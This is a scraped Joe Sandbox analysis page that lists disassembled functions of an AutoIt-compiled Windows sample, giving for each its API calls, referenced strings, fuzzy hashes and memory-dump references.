Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 30be522ca1d3771aabb723650e32ef47e6012788e925918222775391417416df
Instruction ID: 4056a480ef5cb67cc428c914d4e9b0b48f785e4a1f7c68d0a3677f25b23a4549
Opcode Fuzzy Hash: 30be522ca1d3771aabb723650e32ef47e6012788e925918222775391417416df
Instruction Fuzzy Hash: A921567261020AAFDB04DFA8CC45EFA7BF8FB09314F004628FD55E3250E634E8619B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C22E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C22F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C22F30

Strings

0, xrefs: 00C22F07

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 35f03169881d377f15d7d8790f9015b4c9daf8df8188940ded74412272bbf7f6
Instruction ID: 8f3136d1f4235f12a1b8597e4d099e0a54472d5b2f785e7cba5fbfe6d05a4f29
Opcode Fuzzy Hash: 35f03169881d377f15d7d8790f9015b4c9daf8df8188940ded74412272bbf7f6
Instruction Fuzzy Hash: 72110431901234BBCB24DB98ED44B9E73B9EB01310F0500B5E964A76A0D7F0EF04D799

Uniqueness

Uniqueness Score: -1.00%

Function 00C324CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C32520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C32549

Strings

<local>, xrefs: 00C32511

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: fe14a0de2975a0a3dec78888a80d18dbf005f6418fd8c21322ba424533b90c9f
Instruction ID: d7cd2b93e151e29de4d718d5c31730967606a6b98e8e6f51744ccc03bd29a9dd
Opcode Fuzzy Hash: fe14a0de2975a0a3dec78888a80d18dbf005f6418fd8c21322ba424533b90c9f
Instruction Fuzzy Hash: F511ACB0511225BADF248F628C99FBBFFA8FB06751F10812AF91586040D2706B81DAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00C48752 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 00C4879F

Strings

@U=u, xrefs: 00C4879F, 00C487DB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 81a4573b981cda9e5d94fe229b830dfe521f0657e548d571593a7cc18f87ef7d
Instruction ID: 2cc33c20954c48687a9cd8ba74f1079955d75ca2a8abfa589bd5f2903d74c155
Opcode Fuzzy Hash: 81a4573b981cda9e5d94fe229b830dfe521f0657e548d571593a7cc18f87ef7d
Instruction Fuzzy Hash: FE21E479600109EF8F15DFA8D8909EE7BB5FB4D340B114198FE15A3360DB31AD65DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C46825 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 00C4689B

Strings

button, xrefs: 00C46872
@U=u, xrefs: 00C4689B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$button
API String ID: 3850602802-1762282863
Opcode ID: 49d022fa59eeae38fdd2df43c7416ec59d7efee245579caac676548d7dc1f6c2
Instruction ID: 8f0607d2aa2af7972acf5e0d26b11fa2fc3f13187b6482eef7362888529d10d3
Opcode Fuzzy Hash: 49d022fa59eeae38fdd2df43c7416ec59d7efee245579caac676548d7dc1f6c2
Instruction Fuzzy Hash: E4110432150209ABDF018F60CC41FEA376AFF59714F114618FE64A71D0C732E891AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C47AFB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133E,00000000,?), ref: 00C47B47

Strings

@U=u, xrefs: 00C47B47

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 5d0e6482689f237bb9a6600a388ad31942591b58d872ef01b7432ee066dc6cd8
Instruction ID: 5e36749474eef4bfb68a5f847fbc4fde013b9c1b03e5941d31d0a21bde9988b7
Opcode Fuzzy Hash: 5d0e6482689f237bb9a6600a388ad31942591b58d872ef01b7432ee066dc6cd8
Instruction Fuzzy Hash: C411D034504348AFDB20DF34C891AE7B7E8FF06320F108A1DE9BA57291DB7169419B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C380A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C380C8,?,00000000,?,?), ref: 00C38322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C380CB
htons.WSOCK32(00000000,?,00000000), ref: 00C38108

Strings

255.255.255.255, xrefs: 00C380E3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: a722dce5c19952ddbb3ef9a0113ab3ef93685ddda7daabfb78f57d83bf93b1fc
Instruction ID: a18fb6bbe06aa7604dc3c70d869840c04fbc7ddef7fd5e998483d5b565593377
Opcode Fuzzy Hash: a722dce5c19952ddbb3ef9a0113ab3ef93685ddda7daabfb78f57d83bf93b1fc
Instruction Fuzzy Hash: 00110474210305ABCB20AF64CC86FFEB374FF05320F10852AF92197291DB72A959D791

Uniqueness

Uniqueness Score: -1.00%

Function 00C19989 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C219CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C19778,?,?,00000034,00000800,?,00000034), ref: 00C219F6

SendMessageW.USER32(?,0000102B,?,00000000), ref: 00C199EB
SendMessageW.USER32(?,0000102B,?,00000000), ref: 00C19A10

Strings

@U=u, xrefs: 00C199EB, 00C19A10

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$MemoryProcessWrite
String ID: @U=u
API String ID: 1195347164-2594219639
Opcode ID: 4b5dea8b98c288b000a39b65a7a207293213b291d994391f69c6509614da5e7b
Instruction ID: 3eebbad8d816cf6863ac52b5842ff7d236d9a1eb21e5281e416f03de3bf01612
Opcode Fuzzy Hash: 4b5dea8b98c288b000a39b65a7a207293213b291d994391f69c6509614da5e7b
Instruction Fuzzy Hash: 48012632900218ABEB20AB64DC86FEEBB78EF15320F10016AF915A71D1DB706D94DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C19AB7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00C19ADD
SendMessageW.USER32(?,0000040D,?,00000000), ref: 00C19B10

Part of subcall function 00C21997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C197A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00C219C1

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

Strings

@U=u, xrefs: 00C19ADD, 00C19B10

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$MemoryProcessRead_memmove
String ID: @U=u
API String ID: 339422723-2594219639
Opcode ID: 9710a3ad8f97f324f2b6c7578b79e0013c3f97ac7f3f77698449f778935cfd5e
Instruction ID: 6648b544a7509273a0d5e4cbf3b32712aad668bbd1e62c0c4f341590436247ac
Opcode Fuzzy Hash: 9710a3ad8f97f324f2b6c7578b79e0013c3f97ac7f3f77698449f778935cfd5e
Instruction Fuzzy Hash: 4D016D71801128AFDB60EF60DC91EE977BCFB15340F40C0AAFA89A6150EE314E99DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C4C86D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00BFBB8A,?,?,?), ref: 00C4C8E1

Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00C4C8C7

Strings

@U=u, xrefs: 00C4C8C7

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: @U=u
API String ID: 982171247-2594219639
Opcode ID: 2588d99d2753d5eb3121f4792d6a6a95bea57bab729560c08b7ed86b6dfb5408
Instruction ID: 493a51a10bf5b42e1582e91a7f1bad602636f935802f36fe5b4d3c32f9dc0493
Opcode Fuzzy Hash: 2588d99d2753d5eb3121f4792d6a6a95bea57bab729560c08b7ed86b6dfb5408
Instruction Fuzzy Hash: A201F731201204AFCB21AF14CC84F6A3BB6FF95324F140068F9564B2F1CB31A812EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C19A1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C19A2E
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C19A46

Strings

@U=u, xrefs: 00C19A2E, 00C19A46

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: e35991899dbfaa088e65edcd5b08afbe5eca19b10c349c7f51710b9dcec8f6d9
Instruction ID: b3a101a9cc1b7c3bb4f095f0f568d734777785a1c3e5abb7d2ad4c084008b89d
Opcode Fuzzy Hash: e35991899dbfaa088e65edcd5b08afbe5eca19b10c349c7f51710b9dcec8f6d9
Instruction Fuzzy Hash: DCE09B35342351B6F63055164C5EFD75F59DF8BB61F110039BB05991D1CAE14CD6B2A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A1A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C1A1BA
SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C1A1EA

Strings

@U=u, xrefs: 00C1A1BA, 00C1A1EA

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 8ab07bbf303d356ff9bec1bc01c0bbe49798bd48dc64751ba31b45f1a5b6b1e2
Instruction ID: bfe8cadbde02eae8192f601826b41c185a00a155966b82ba50aad6b10feb12a2
Opcode Fuzzy Hash: 8ab07bbf303d356ff9bec1bc01c0bbe49798bd48dc64751ba31b45f1a5b6b1e2
Instruction Fuzzy Hash: E3F0A735241308BBFA122A90DC46FEA3B5DFF19791F100038F7055A0E1D9E25C816750

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C19E2E: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C19E47
Part of subcall function 00C19E2E: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C19E81

SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00C1A34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C1A35B

Strings

@U=u, xrefs: 00C1A34B, 00C1A35B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 91ed1c646ee02305d6825e5827f74d79e1aff7373aa8aff8bbef59452930b918
Instruction ID: 6823ec963bcc6c94cda5864b2b2d17c71df19bbfbca2cd88ad208977b960c865
Opcode Fuzzy Hash: 91ed1c646ee02305d6825e5827f74d79e1aff7373aa8aff8bbef59452930b918
Instruction Fuzzy Hash: 16E0D8793053097FF6251A61DC4AFD7372CEB4A7A1F110039B300450B0EEA2CC917520

Uniqueness

Uniqueness Score: -1.00%

Function 00C251CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C251E8
_wcscmp.LIBCMT ref: 00C251FA

Strings

#32770, xrefs: 00C251F4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: cc65507e2bf2f2860352932d83f1f3a0b4b73c14e6c32e799ba9bc00a8d398e5
Instruction ID: 81c6f2b6bde2667d07727910960e6ff920a24743e913664ad8acbdc529dec3e7
Opcode Fuzzy Hash: cc65507e2bf2f2860352932d83f1f3a0b4b73c14e6c32e799ba9bc00a8d398e5
Instruction Fuzzy Hash: 83E0613250023C57D3109695EC09F9BF7ECEB41731F00016BFD14D3040E5709A0587E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C181BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C181CA

Part of subcall function 00BE3598: _doexit.LIBCMT ref: 00BE35A2

Strings

AutoIt, xrefs: 00C181BE
Error allocating memory., xrefs: 00C181C3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e8e97689a5a87b91a6bd839239deb1b13b29cb0a3aa188eb31392e4fa5c8bc52
Instruction ID: 58b3404a4f8a219ef1cfaebe0c13221570abfae6046354b6fec4538565dc3ad7
Opcode Fuzzy Hash: e8e97689a5a87b91a6bd839239deb1b13b29cb0a3aa188eb31392e4fa5c8bc52
Instruction Fuzzy Hash: B9D012362C536832D21532A96C0AFC979C88B15B52F144465BB08555D38AE255C64299

Uniqueness

Uniqueness Score: -1.00%

Function 00BFB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00BFB564: _memset.LIBCMT ref: 00BFB571

Part of subcall function 00BE0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BFB540,?,?,?,00BC100A), ref: 00BE0B89

IsDebuggerPresent.KERNEL32(?,?,?,00BC100A), ref: 00BFB544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BC100A), ref: 00BFB553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BFB54E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: bbdcba6e6203c75fb5233f03ee072d029d8ac61b9469c5da1180dd38efbc6194
Instruction ID: e71a920cdcd4cf56b81c61a160e97ec9499132790e978f07d1dfc44d07f93d74
Opcode Fuzzy Hash: bbdcba6e6203c75fb5233f03ee072d029d8ac61b9469c5da1180dd38efbc6194
Instruction Fuzzy Hash: E4E06DB42107148BD730EF28E414B567BE0BB14759F0089BDE586C7261D7B9D448CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C45BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C45BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C45C08

Part of subcall function 00C254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C2555E

Strings

Shell_TrayWnd, xrefs: 00C45BEE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 21f39e5a6caaa1cb9c651229a0298f4dbf85dd9ae94241d6673a32d4df4863d1
Instruction ID: c670d1aa4705390e0512918d59a238970311a1000006463f5d2e8162a78d9f31
Opcode Fuzzy Hash: 21f39e5a6caaa1cb9c651229a0298f4dbf85dd9ae94241d6673a32d4df4863d1
Instruction Fuzzy Hash: 93D0C935388311B7E764BB70AC0BFDB6A14BB41B51F014839B649AA1D1D9E45801C654

Uniqueness

Uniqueness Score: -1.00%

Function 00C198BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C198CB
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00C198D9

Strings

@U=u, xrefs: 00C198CB, 00C198D9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
